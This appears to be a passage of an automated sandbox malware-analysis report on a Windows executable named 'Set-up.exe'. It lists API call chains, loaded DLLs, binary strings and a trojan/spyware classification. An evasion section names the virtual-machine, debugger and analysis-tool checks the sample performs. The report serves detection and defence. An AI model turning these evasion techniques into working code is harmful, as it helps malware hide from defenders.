    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E5F0400_2_00E5F040
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E830200_2_00E83020
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FDF0100_2_00FDF010
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E5D1D00_2_00E5D1D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E511900_2_00E51190
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DA11400_2_00DA1140
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E711000_2_00E71100
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E0D2300_2_00E0D230
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F233F00_2_00F233F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E6B3F00_2_00E6B3F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FFB3800_2_00FFB380
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E073100_2_00E07310
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E5B4B00_2_00E5B4B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FF74A00_2_00FF74A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DA34500_2_00DA3450
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FED4300_2_00FED430
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FEF4300_2_00FEF430
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C8D5C00_2_00C8D5C0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FD35C00_2_00FD35C0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FF35B00_2_00FF35B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E6F5B00_2_00E6F5B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CEF5B00_2_00CEF5B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FFB6F00_2_00FFB6F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FD56D00_2_00FD56D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FB96B00_2_00FB96B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F236A00_2_00F236A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_010117A00_2_010117A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FE37E00_2_00FE37E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D277E00_2_00D277E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E797D00_2_00E797D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E097900_2_00E09790
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FF57800_2_00FF5780
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CFD7400_2_00CFD740
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FF77300_2_00FF7730
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FCB7200_2_00FCB720
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FFD8E00_2_00FFD8E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D398800_2_00D39880
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FED8900_2_00FED890
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D2B8400_2_00D2B840
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E0F8500_2_00E0F850
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E5D9E00_2_00E5D9E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F439600_2_00F43960
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FD99200_2_00FD9920
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DEB9000_2_00DEB900
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E29A500_2_00E29A50
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E49A100_2_00E49A10
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E9FA100_2_00E9FA10
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CC1BE00_2_00CC1BE0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01003A700_2_01003A70
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FDDB800_2_00FDDB80
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D5BB500_2_00D5BB50
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FD1B500_2_00FD1B50
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FFBB100_2_00FFBB10
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E07CA00_2_00E07CA0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00EEDC6C0_2_00EEDC6C
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DD7C700_2_00DD7C70
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E5FC500_2_00E5FC50
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E0FDE00_2_00E0FDE0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C95DB00_2_00C95DB0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FE1D800_2_00FE1D80
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E6FD600_2_00E6FD60
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F2DD600_2_00F2DD60
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DF1D300_2_00DF1D30
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C93ED00_2_00C93ED0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CF3EF00_2_00CF3EF0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CA5EB00_2_00CA5EB0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FF3E400_2_00FF3E40
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E09E200_2_00E09E20
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FFDE300_2_00FFDE30
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01001E600_2_01001E60
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FFFF700_2_00FFFF70
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E37120 appears 50 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 01008B80 appears 34 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00CC5340 appears 35 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00D644A0 appears 46 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00C873F0 appears 47 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E5E710 appears 32 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E5CBC0 appears 551 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E5A170 appears 58 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00CC4FD0 appears 145 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00CC4F40 appears 162 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E37310 appears 50 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00C875A0 appears 298 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E5C9B0 appears 102 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E5CA40 appears 108 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00CC50A0 appears 50 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E37220 appears 861 times
    Source: Set-up.exeStatic PE information: invalid certificate
    Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: Set-up.exeBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
    Source: classification engineClassification label: mal88.troj.spyw.evad.winEXE@1/0@9/2
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C9D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,0_2_00C9D090
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CF3EF0 strcmp,CertOpenSystemStoreA,CertEnumCertificatesInStore,CertEnumCertificatesInStore,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CertGetIntendedKeyUsage,GetLastError,CertGetEnhancedKeyUsage,CertGetEnhancedKeyUsage,strcmp,GetLastError,CertFreeCertificateContext,CertCloseStore,0_2_00CF3EF0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C8255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00C8255D
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C829FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_00C829FF
    Source: C:\Users\user\Desktop\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
    Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
    Source: Set-up.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
    Source: Set-up.exeString found in binary or memory: in-addr.arpa
    Source: Set-up.exeString found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
    Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
    Source: Set-up.exeString found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
    Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
    Source: Set-up.exeString found in binary or memory: set-addPolicy
    Source: Set-up.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: Set-up.exeStatic file information: File size 7343240 > 1048576
    Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4dd800
    Source: Set-up.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x152200
    Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C814E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C814E0
    Source: Set-up.exeStatic PE information: section name: .eh_fram
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C08A40 push eax; ret 0_3_00C08A41
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00BFF9E8 pushad ; iretd 0_3_00BFF9E9
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C05D20 push 462000CBh; retn 0000h0_3_00C05D2A
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C08A40 push eax; ret 0_3_00C08A41
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00BFF9E8 pushad ; iretd 0_3_00BFF9E9
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C05D20 push 462000CBh; retn 0000h0_3_00C05D2A
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C08A40 push eax; ret 0_3_00C08A41
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00BFF9E8 pushad ; iretd 0_3_00BFF9E9
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C05D20 push 462000CBh; retn 0000h0_3_00C05D2A
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C08A40 push eax; ret 0_3_00C08A41
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C0EF54 pushad ; iretd 0_3_00C0EF55
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00BFF9E8 pushad ; iretd 0_3_00BFF9E9
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00C05D20 push 462000CBh; retn 0000h0_3_00C05D2A
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_010041D0 push eax; mov dword ptr [esp], edx0_2_010041D5
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00EA0300 push eax; mov dword ptr [esp], 00000000h0_2_00EA0305
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CFC6D0 push eax; mov dword ptr [esp], edx0_2_00CFC6D5
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D28640 push eax; mov dword ptr [esp], edx0_2_00D28645
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CC0AC0 push eax; mov dword ptr [esp], 00000000h0_2_00CC0AC4
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DE1130 push eax; mov dword ptr [esp], edx0_2_00DE1135
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CE1430 push eax; mov dword ptr [esp], 00000000h0_2_00CE1433

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\Set-up.exeCode function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second 0_2_00C829FF
    Source: Set-up.exeBinary or memory string: PROCMON.EXE
    Source: Set-up.exeBinary or memory string: X64DBG.EXE
    Source: Set-up.exeBinary or memory string: WINDBG.EXE
    Source: Set-up.exeBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
    Source: Set-up.exeBinary or memory string: WIRESHARK.EXE
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E69980 rdtsc 0_2_00E69980
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C829FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_00C829FF
    Source: C:\Users\user\Desktop\Set-up.exeAPI coverage: 7.5 %
    Source: C:\Users\user\Desktop\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C8255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00C8255D
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C829FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_00C829FF
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E5E270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_00E5E270
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C8255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00C8255D
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C8255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00C8255D
    Source: Set-up.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
    Source: Set-up.exeBinary or memory string: Hyper-V RAW
    Source: Set-up.exeBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
    Source: Set-up.exe, 00000000.00000003.2049588705.0000000000997000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
    Source: Set-up.exe, 00000000.00000002.2253280536.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2251976781.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2252171171.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2252153907.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2251997102.0000000000C0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E69980 rdtsc 0_2_00E69980
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C829FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_00C829FF
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C814E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C814E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C8116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,0_2_00C8116C
    Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E693D0 GetSystemTime,SystemTimeToFileTime,0_2_00E693D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01153F30 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_01153F30
